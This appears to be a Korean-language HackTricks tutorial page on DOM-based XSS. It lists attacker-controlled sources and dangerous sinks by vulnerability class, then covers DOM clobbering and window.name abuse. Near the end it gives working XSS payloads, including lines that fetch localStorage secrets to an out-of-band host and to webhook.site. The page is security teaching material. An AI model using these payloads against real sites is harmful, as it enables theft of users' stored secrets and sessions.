DOM XSS

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°

DOM 취약점

DOM 취약점은 κ³΅κ²©μžκ°€ μ œμ–΄ν•˜λŠ” sources(예: location.search, document.referrer, document.cookie)μ—μ„œ λ‚˜μ˜¨ 데이터가 μ•ˆμ „ν•˜μ§€ μ•Šκ²Œ sinks둜 전달될 λ•Œ λ°œμƒν•©λ‹ˆλ‹€. sinksλŠ” μ•…μ„± 데이터λ₯Ό λ°›μœΌλ©΄ μœ ν•΄ν•œ λ‚΄μš©μ„ μ‹€ν–‰ν•˜κ±°λ‚˜ λ Œλ”λ§ν•  수 μžˆλŠ” ν•¨μˆ˜λ‚˜ 객체(예: eval(), document.body.innerHTML)μž…λ‹ˆλ‹€.

  • SourcesλŠ” κ³΅κ²©μžκ°€ μ‘°μž‘ν•  수 μžˆλŠ” μž…λ ₯κ°’λ“€λ‘œ, URLs, cookies, μ›Ή λ©”μ‹œμ§€ 등을 ν¬ν•¨ν•©λ‹ˆλ‹€.
  • SinksλŠ” μ•…μ„± 데이터가 슀크립트 μ‹€ν–‰κ³Ό 같은 λΆ€μž‘μš©μ„ μΌμœΌν‚¬ 수 μžˆλŠ” 잠재적으둜 μœ„ν—˜ν•œ μ—”λ“œν¬μΈνŠΈμž…λ‹ˆλ‹€.

이 μœ„ν—˜μ€ sourceμ—μ„œ sink둜 데이터가 μ μ ˆν•œ κ²€μ¦μ΄λ‚˜ μ •ν™” 없이 흐λ₯Ό λ•Œ λ°œμƒν•˜λ©°, XSS와 같은 곡격을 κ°€λŠ₯ν•˜κ²Œ ν•©λ‹ˆλ‹€.

Tip

더 μ΅œμ‹ μ˜ sources와 sinks λͺ©λ‘μ€ λ‹€μŒμ—μ„œ 확인할 수 μžˆμŠ΅λ‹ˆλ‹€: https://github.com/wisec/domxsswiki/wiki

일반적인 sources:

document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB(mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

일반적인 Sinks:

Open RedirectJavascript InjectionDOM-data manipulationjQuery
locationeval()scriptElement.srcadd()
location.hostFunction() constructorscriptElement.textafter()
location.hostnamesetTimeout()scriptElement.textContentappend()
location.hrefsetInterval()scriptElement.innerTextanimate()
location.pathnamesetImmediate()someDOMElement.setAttribute()insertAfter()
location.searchexecCommand()someDOMElement.searchinsertBefore()
location.protocolexecScript()someDOMElement.textbefore()
location.assign()msSetImmediate()someDOMElement.textContenthtml()
location.replace()range.createContextualFragment()someDOMElement.innerTextprepend()
open()crypto.generateCRMFRequest()someDOMElement.outerTextreplaceAll()
domElem.srcdoc``Local file-path manipulationsomeDOMElement.valuereplaceWith()
XMLHttpRequest.open()FileReader.readAsArrayBuffer()someDOMElement.namewrap()
XMLHttpRequest.send()FileReader.readAsBinaryString()someDOMElement.targetwrapInner()
jQuery.ajax()FileReader.readAsDataURL()someDOMElement.methodwrapAll()
$.ajax()FileReader.readAsText()someDOMElement.typehas()
``Ajax request manipulationFileReader.readAsFile()someDOMElement.backgroundImageconstructor()
XMLHttpRequest.setRequestHeader()FileReader.root.getFile()someDOMElement.cssTextinit()
XMLHttpRequest.open()FileReader.root.getFile()someDOMElement.codebaseindex()
XMLHttpRequest.send()Link manipulationsomeDOMElement.innerHTMLjQuery.parseHTML()
jQuery.globalEval()someDOMElement.hrefsomeDOMElement.outerHTML$.parseHTML()
$.globalEval()someDOMElement.srcsomeDOMElement.insertAdjacentHTMLClient-side JSON injection
``HTML5-storage manipulationsomeDOMElement.actionsomeDOMElement.oneventJSON.parse()
sessionStorage.setItem()XPath injectiondocument.write()jQuery.parseJSON()
localStorage.setItem()document.evaluate()document.writeln()$.parseJSON()
**[**`Denial of Service`**](dom-xss.md#denial-of-service)**someDOMElement.evaluate()document.title``Cookie manipulation
requestFileSystem()``Document-domain manipulationdocument.implementation.createHTMLDocument()document.cookie
RegExp()document.domainhistory.pushState()WebSocket-URL poisoning
Client-Side SQl injectionWeb-message manipulationhistory.replaceState()WebSocket
executeSql()postMessage()````

The innerHTML sink은 ν˜„λŒ€ λΈŒλΌμš°μ €μ—μ„œ script μš”μ†Œλ₯Ό ν—ˆμš©ν•˜μ§€ μ•ŠμœΌλ©°, svg onload μ΄λ²€νŠΈλ„ μž‘λ™ν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€. λ”°λΌμ„œ imgλ‚˜ iframe 같은 λŒ€μ²΄ μš”μ†Œλ₯Ό μ‚¬μš©ν•΄μ•Ό ν•©λ‹ˆλ‹€.

이 μœ ν˜•μ˜ XSSλŠ” μ•„λ§ˆλ„ μ°ΎκΈ° κ°€μž₯ μ–΄λ €μš΄(hardest to find) μœ ν˜•μž…λ‹ˆλ‹€. μ½”λ“œ λ‚΄λΆ€μ˜ JSλ₯Ό 듀여닀보고, μ—¬λŸ¬λΆ„μ΄ μ œμ–΄ν•˜λŠ” κ°’(value)을 κ°–λŠ” μ–΄λ–€ 객체λ₯Ό μ‚¬μš©(using) ν•˜κ³  μžˆλŠ”μ§€ ν™•μΈν•œ λ‹€μŒ, 그것을 μ•…μš©ν•΄ μž„μ˜μ˜ JSλ₯Ό μ‹€ν–‰ν•  수 μžˆλŠ” 방법이 μžˆλŠ”μ§€ 평가해야 ν•©λ‹ˆλ‹€.

μ°Ύμ•„λ‚΄κΈ° μœ„ν•œ 도ꡬ

μ˜ˆμ‹œ

Open Redirect

From: https://portswigger.net/web-security/dom-based/open-redirection

DOMμ—μ„œμ˜ Open redirect 취약점은 μŠ€ν¬λ¦½νŠΈκ°€ κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό λ‹€λ₯Έ λ„λ©”μΈμœΌλ‘œμ˜ 이동을 μ‹œμž‘ν•  수 μžˆλŠ” sink에 기둝할 λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

λ¦¬λ””λ ‰μ…˜μ΄ λ°œμƒν•˜λŠ” URL의 μ‹œμž‘ 뢀뢄을 μ œμ–΄ν•  수 μžˆλ‹€λ©΄, javascript:alert(1) 같은 μž„μ˜μ˜ μ½”λ“œλ₯Ό μ‹€ν–‰ν•˜λŠ” 것이 κ°€λŠ₯ν•˜λ‹€λŠ” 점을 μ΄ν•΄ν•˜λŠ” 것이 μ€‘μš”ν•©λ‹ˆλ‹€.

Sinks:

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
domElem.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()

From: https://portswigger.net/web-security/dom-based/cookie-manipulation

DOM-based cookie-manipulation vulnerabilitiesλŠ” μŠ€ν¬λ¦½νŠΈκ°€ κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό cookie의 값에 ν¬ν•¨μ‹œν‚¬ λ•Œ λ°œμƒν•©λ‹ˆλ‹€. 이 취약점은 μ‚¬μ΄νŠΈ λ‚΄μ—μ„œ cookieκ°€ μ‚¬μš©λ˜λŠ” 경우 μ›ΉνŽ˜μ΄μ§€μ˜ 예기치 μ•Šμ€ λ™μž‘μ„ μ΄ˆλž˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€. λ˜ν•œ cookieκ°€ μ‚¬μš©μž μ„Έμ…˜μ„ μΆ”μ ν•˜λŠ” 데 κ΄€μ—¬ν•œλ‹€λ©΄ session fixation 곡격을 μˆ˜ν–‰ν•˜λŠ” 데 μ•…μš©λ  수 μžˆμŠ΅λ‹ˆλ‹€. The primary sink associated with this vulnerability is:

Sinks:

document.cookie

JavaScript Injection

From: https://portswigger.net/web-security/dom-based/javascript-injection

DOM-based JavaScript injection 취약점은 κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό μŠ€ν¬λ¦½νŠΈκ°€ JavaScript μ½”λ“œλ‘œ μ‹€ν–‰ν•  λ•Œ μƒμ„±λ©λ‹ˆλ‹€.

Sinks:

eval()
Function() constructor
setTimeout()
setInterval()
setImmediate()
execCommand()
execScript()
msSetImmediate()
range.createContextualFragment()
crypto.generateCRMFRequest()

Document-domain manipulation

좜처: https://portswigger.net/web-security/dom-based/document-domain-manipulation

Document-domain manipulation vulnerabilities λŠ” μŠ€ν¬λ¦½νŠΈκ°€ κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό μ‚¬μš©ν•˜μ—¬ document.domain 속성을 μ„€μ •ν•  λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

document.domain 속성은 λΈŒλΌμš°μ €κ°€ same-origin policyλ₯Ό μ μš©ν•˜λŠ” 데 μžˆμ–΄ 핡심 역할을 ν•©λ‹ˆλ‹€. μ„œλ‘œ λ‹€λ₯Έ 좜처의 두 νŽ˜μ΄μ§€κ°€ document.domain을 같은 κ°’μœΌλ‘œ μ„€μ •ν•˜λ©΄ μ œν•œ 없이 μƒν˜Έμž‘μš©ν•  수 μžˆμŠ΅λ‹ˆλ‹€. λΈŒλΌμš°μ €λŠ” document.domain에 ν• λ‹Ήν•  수 μžˆλŠ” 값에 λŒ€ν•΄ νŠΉμ • μ œν•œμ„ 두어 μ‹€μ œ νŽ˜μ΄μ§€ μΆœμ²˜μ™€ μ™„μ „νžˆ λ¬΄κ΄€ν•œ 값을 ν• λ‹Ήν•˜λŠ” 것을 λ°©μ§€ν•˜μ§€λ§Œ, μ˜ˆμ™Έκ°€ μ‘΄μž¬ν•©λ‹ˆλ‹€. 일반적으둜 λΈŒλΌμš°μ €λŠ” ν•˜μœ„ 도메인 λ˜λŠ” μƒμœ„ λ„λ©”μΈμ˜ μ‚¬μš©μ„ ν—ˆμš©ν•©λ‹ˆλ‹€.

Sinks:

document.domain

WebSocket-URL poisoning

From: https://portswigger.net/web-security/dom-based/websocket-url-poisoning

WebSocket-URL poisoning은 μŠ€ν¬λ¦½νŠΈκ°€ WebSocket μ—°κ²°μ˜ λŒ€μƒ URL둜 μ œμ–΄ κ°€λŠ₯ν•œ 데이터λ₯Ό μ‚¬μš©ν•˜λŠ” κ²½μš°μ— λ°œμƒν•©λ‹ˆλ‹€.

Sinks:

WebSocket constructorλŠ” WebSocket-URL poisoning 취약점을 μœ λ°œν•  수 μžˆμŠ΅λ‹ˆλ‹€.

From: https://portswigger.net/web-security/dom-based/link-manipulation

DOM-based link-manipulation vulnerabilitiesλŠ” μŠ€ν¬λ¦½νŠΈκ°€ ν˜„μž¬ νŽ˜μ΄μ§€ λ‚΄μ˜ λ„€λΉ„κ²Œμ΄μ…˜ λŒ€μƒ(예: 클릭 κ°€λŠ₯ν•œ λ§ν¬λ‚˜ 폼의 제좜 URL)에 κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό μž‘μ„±ν•  λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

Sinks:

someDOMElement.href
someDOMElement.src
someDOMElement.action

Ajax request manipulation

좜처: https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation

Ajax request manipulation vulnerabilities 은 μŠ€ν¬λ¦½νŠΈκ°€ XmlHttpRequest 객체λ₯Ό μ‚¬μš©ν•΄ λ°œν–‰λœ Ajax μš”μ²­μ— attacker-controllable data into an Ajax request λ₯Ό μž‘μ„±ν•  λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

Sinks:

XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.globalEval()
$.globalEval()

Local file-path manipulation

From: https://portswigger.net/web-security/dom-based/local-file-path-manipulation

Local file-path manipulation vulnerabilitiesλŠ” μŠ€ν¬λ¦½νŠΈκ°€ 파일 처리 API에 filename λ§€κ°œλ³€μˆ˜λ‘œ κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό 전달할 λ•Œ λ°œμƒν•©λ‹ˆλ‹€. 이 취약점은 κ³΅κ²©μžκ°€ URL을 κ΅¬μ„±ν•˜μ—¬ λ‹€λ₯Έ μ‚¬μš©μžκ°€ λ°©λ¬Έν•  경우 μ‚¬μš©μžμ˜ λΈŒλΌμš°μ €κ°€ μž„μ˜μ˜ 둜컬 νŒŒμΌμ„ μ—΄κ±°λ‚˜ μ“°κ²Œ λ§Œλ“€ 수 μžˆμŠ΅λ‹ˆλ‹€.

Sinks:

FileReader.readAsArrayBuffer()
FileReader.readAsBinaryString()
FileReader.readAsDataURL()
FileReader.readAsText()
FileReader.readAsFile()
FileReader.root.getFile()
FileReader.root.getFile()

Client-Side SQl injection

From: https://portswigger.net/web-security/dom-based/client-side-sql-injection

Client-side SQL-injection vulnerabilitiesλŠ” μŠ€ν¬λ¦½νŠΈκ°€ attacker-controllable data into a client-side SQL query in an unsafe wayλ₯Ό 포함할 λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

Sinks:

executeSql()

HTML5-storage manipulation

좜처: https://portswigger.net/web-security/dom-based/html5-storage-manipulation

HTML5-storage manipulation vulnerabilitiesλŠ” μŠ€ν¬λ¦½νŠΈκ°€ μ›Ή λΈŒλΌμš°μ €μ˜ HTML5 μ €μž₯μ†Œμ— κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό μ €μž₯ν•  λ•Œ λ°œμƒν•©λ‹ˆλ‹€ (localStorage λ˜λŠ” sessionStorage). 이 λ™μž‘ μžμ²΄κ°€ 본질적으둜 λ³΄μ•ˆ 취약점은 μ•„λ‹ˆμ§€λ§Œ, μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ΄ 이후에 μ €μž₯된 데이터λ₯Ό 읽어 μ•ˆμ „ν•˜μ§€ μ•Šκ²Œ μ²˜λ¦¬ν•˜λ©΄ λ¬Έμ œκ°€ λ©λ‹ˆλ‹€. 이둜 인해 κ³΅κ²©μžλŠ” μ €μž₯ λ©”μ»€λ‹ˆμ¦˜μ„ μ΄μš©ν•΄ λ‹€λ₯Έ DOM-based 곡격을 μˆ˜ν–‰ν•  수 있으며, 예λ₯Ό λ“€μ–΄ cross-site scripting 및 JavaScript injection 등이 μžˆμŠ΅λ‹ˆλ‹€.

Sinks:

sessionStorage.setItem()
localStorage.setItem()

XPath injection

좜처: https://portswigger.net/web-security/dom-based/client-side-xpath-injection

DOM-based XPath-injection vulnerabilitiesλŠ” scriptκ°€ attacker-controllable dataλ₯Ό XPath query에 포함할 λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

Sinks:

document.evaluate()
someDOMElement.evaluate()

Client-side JSON injection

From: https://portswigger.net/web-security/dom-based/client-side-json-injection

DOM-based JSON-injection vulnerabilitiesλŠ” μŠ€ν¬λ¦½νŠΈκ°€ attacker-controllable dataλ₯Ό JSON 데이터 ꡬ쑰둜 νŒŒμ‹±λ˜λŠ” λ¬Έμžμ—΄μ— ν¬ν•¨μ‹œν‚€κ³  κ·Έ ν›„ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ—μ„œ μ²˜λ¦¬ν•  λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

Sinks:

JSON.parse()
jQuery.parseJSON()
$.parseJSON()

Web-message manipulation

From: https://portswigger.net/web-security/dom-based/web-message-manipulation

Web-message vulnerabilities λŠ” μŠ€ν¬λ¦½νŠΈκ°€ λΈŒλΌμš°μ € λ‚΄μ˜ λ‹€λ₯Έ λ¬Έμ„œλ‘œ κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό μ›Ή λ©”μ‹œμ§€λ‘œ 전솑할 λ•Œ λ°œμƒν•©λ‹ˆλ‹€. μ·¨μ•½ν•œ Web-message manipulation의 μ˜ˆμ‹œλŠ” PortSwigger’s Web Security Academyμ—μ„œ 확인할 수 μžˆμŠ΅λ‹ˆλ‹€.

Sinks:

μ›Ή λ©”μ‹œμ§€λ₯Ό λ³΄λ‚΄λŠ” postMessage() λ©”μ„œλ“œλŠ”, λ©”μ‹œμ§€λ₯Ό μˆ˜μ‹ ν•˜λŠ” 이벀트 λ¦¬μŠ€λ„ˆκ°€ μˆ˜μ‹  데이터λ₯Ό μ•ˆμ „ν•˜μ§€ μ•Šκ²Œ μ²˜λ¦¬ν•  경우 취약점을 μ΄ˆλž˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

DOM-data manipulation

From: https://portswigger.net/web-security/dom-based/dom-data-manipulation

DOM-data manipulation vulnerabilities λŠ” μŠ€ν¬λ¦½νŠΈκ°€ DOM λ‚΄μ˜ ν•„λ“œμ— κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό κΈ°λ‘ν•˜κ³ , κ·Έ ν•„λ“œκ°€ 화면에 λ³΄μ΄λŠ” UIλ‚˜ ν΄λΌμ΄μ–ΈνŠΈ μΈ‘ λ‘œμ§μ—μ„œ μ‚¬μš©λ  λ•Œ λ°œμƒν•©λ‹ˆλ‹€. κ³΅κ²©μžλŠ” 이 취약점을 μ΄μš©ν•΄ νŠΉμ • URL을 ꡬ성할 수 있으며, λ‹€λ₯Έ μ‚¬μš©μžκ°€ ν•΄λ‹Ή URL을 λ°©λ¬Έν•˜λ©΄ ν΄λΌμ΄μ–ΈνŠΈ μΈ‘ UI의 μ™Έν˜•μ΄λ‚˜ λ™μž‘μ΄ 변경될 수 μžˆμŠ΅λ‹ˆλ‹€.

Sinks:

scriptElement.src
scriptElement.text
scriptElement.textContent
scriptElement.innerText
someDOMElement.setAttribute()
someDOMElement.search
someDOMElement.text
someDOMElement.textContent
someDOMElement.innerText
someDOMElement.outerText
someDOMElement.value
someDOMElement.name
someDOMElement.target
someDOMElement.method
someDOMElement.type
someDOMElement.backgroundImage
someDOMElement.cssText
someDOMElement.codebase
document.title
document.implementation.createHTMLDocument()
history.pushState()
history.replaceState()

Denial of Service

From: https://portswigger.net/web-security/dom-based/denial-of-service

DOM-based denial-of-service vulnerabilitiesλŠ” μŠ€ν¬λ¦½νŠΈκ°€ κ³΅κ²©μžκ°€ μ œμ–΄ν•  수 μžˆλŠ” 데이터λ₯Ό 문제λ₯Ό μΌμœΌν‚€λŠ” ν”Œλž«νΌ API에 μ•ˆμ „ν•˜μ§€ μ•Šκ²Œ 전달할 λ•Œ λ°œμƒν•©λ‹ˆλ‹€. μ—¬κΈ°μ—λŠ” 호좜될 경우 μ‚¬μš©μžμ˜ 컴퓨터가 κ³Όλ„ν•œ CPU λ˜λŠ” λ””μŠ€ν¬ 곡간을 μ†ŒλΉ„ν•˜κ²Œ λ§Œλ“€ 수 μžˆλŠ” APIκ°€ ν¬ν•¨λ©λ‹ˆλ‹€. μ΄λŸ¬ν•œ 취약점은 localStorage에 데이터λ₯Ό μ €μž₯ν•˜λ €λŠ” μ‹œλ„λ₯Ό λΈŒλΌμš°μ €κ°€ κ±°λΆ€ν•˜κ±°λ‚˜ λ°”μœ 슀크립트λ₯Ό μ’…λ£Œν•˜λŠ” λ“± μ›Ήμ‚¬μ΄νŠΈ κΈ°λŠ₯을 μ œν•œν•˜λŠ” μ‹¬κ°ν•œ λΆ€μž‘μš©μ„ μ΄ˆλž˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

Sinks:

requestFileSystem()
RegExp()

Dom Clobbering

Dom Clobbering

암묡적 μ „μ—­ & window.name μ•…μš©

μ„ μ–Έ(var/let/const) 없이 nameλ₯Ό μ°Έμ‘°ν•˜λ©΄ window.name으둜 ν•΄μ„λ©λ‹ˆλ‹€. window.name은 ꡐ차 좜처 λ‚΄λΉ„κ²Œμ΄μ…˜ 간에 μ§€μ†λ˜κΈ° λ•Œλ¬Έμ—, κ³΅κ²©μžλŠ” λΈŒλΌμš°μ§• μ»¨ν…μŠ€νŠΈ 이름을 HTML/JS둜 미리 μ±„μ›Œ 두고 이후 ν”Όν•΄μž μ½”λ“œκ°€ 이λ₯Ό μ‹ λ’°λœ λ°μ΄ν„°λ‘œ λ Œλ”λ§ν•˜κ²Œ ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

  • μ œμ–΄ν•˜λŠ” 이름 μžˆλŠ” μ»¨ν…μŠ€νŠΈμ—μ„œ λŒ€μƒμ„ μ—΄κ±°λ‚˜ μ΄λ™ν•˜μ„Έμš”:
<iframe name="<img src=x onerror=fetch('https://oast/?f='+btoa(localStorage.flag))>" src="https://target/page"></iframe>
  • λ˜λŠ” μ •κ΅ν•˜κ²Œ μ‘°μž‘λœ target name으둜 window.open을 μž¬μ‚¬μš©:
window.open('https://target/page', "<svg/onload=alert(document.domain)>")

μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ΄ 이후에 element.innerHTML = name (or similar sink)을 sanitization 없이 μ‹€ν–‰ν•˜λ©΄, κ³΅κ²©μžκ°€ μ œμ–΄ν•˜λŠ” window.name λ¬Έμžμ—΄μ΄ λŒ€μƒ μ˜€λ¦¬μ§„(target origin)μ—μ„œ μ‹€ν–‰λ˜μ–΄ DOM XSS 및 same-origin storage에 μ ‘κ·Όν•  수 있게 λ©λ‹ˆλ‹€.

κ΄€λ¦¬μž/μžλ™ν™” 흐름: 사전 μ±„μ›Œμ§„ μ €μž₯μ†Œ & javascript: λ„€λΉ„κ²Œμ΄μ…˜

Automation bots (예: Playwright)λŠ” μ’…μ’… λ¨Όμ € λ‚΄λΆ€ νŽ˜μ΄μ§€λ₯Ό λ°©λ¬Έν•΄ localStorage/cookies에 비밀을 μ„€μ •ν•œ λ’€ μ‚¬μš©μž 제곡 URL둜 μ΄λ™ν•©λ‹ˆλ‹€. ν•΄λ‹Ή νλ¦„μ—μ„œ λ°œμƒν•˜λŠ” λͺ¨λ“  DOM XSS primitive(예: window.name abuse 포함)λŠ” 사전 μ±„μ›Œμ§„ 비밀을 exfiltrateν•  수 μžˆμŠ΅λ‹ˆλ‹€:

fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getItem('flag')))

봇이 μŠ€ν‚΄μ„ μ œν•œν•˜μ§€ μ•ŠμœΌλ©΄, javascript: URL (javascript:fetch(...))을 μ œκ³΅ν–ˆμ„ λ•Œ μƒˆ λ„€λΉ„κ²Œμ΄μ…˜ 없이 ν˜„μž¬ originμ—μ„œ μ‹€ν–‰λ˜μ–΄ storage 값을 직접 leakν•©λ‹ˆλ‹€.

참고자료

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°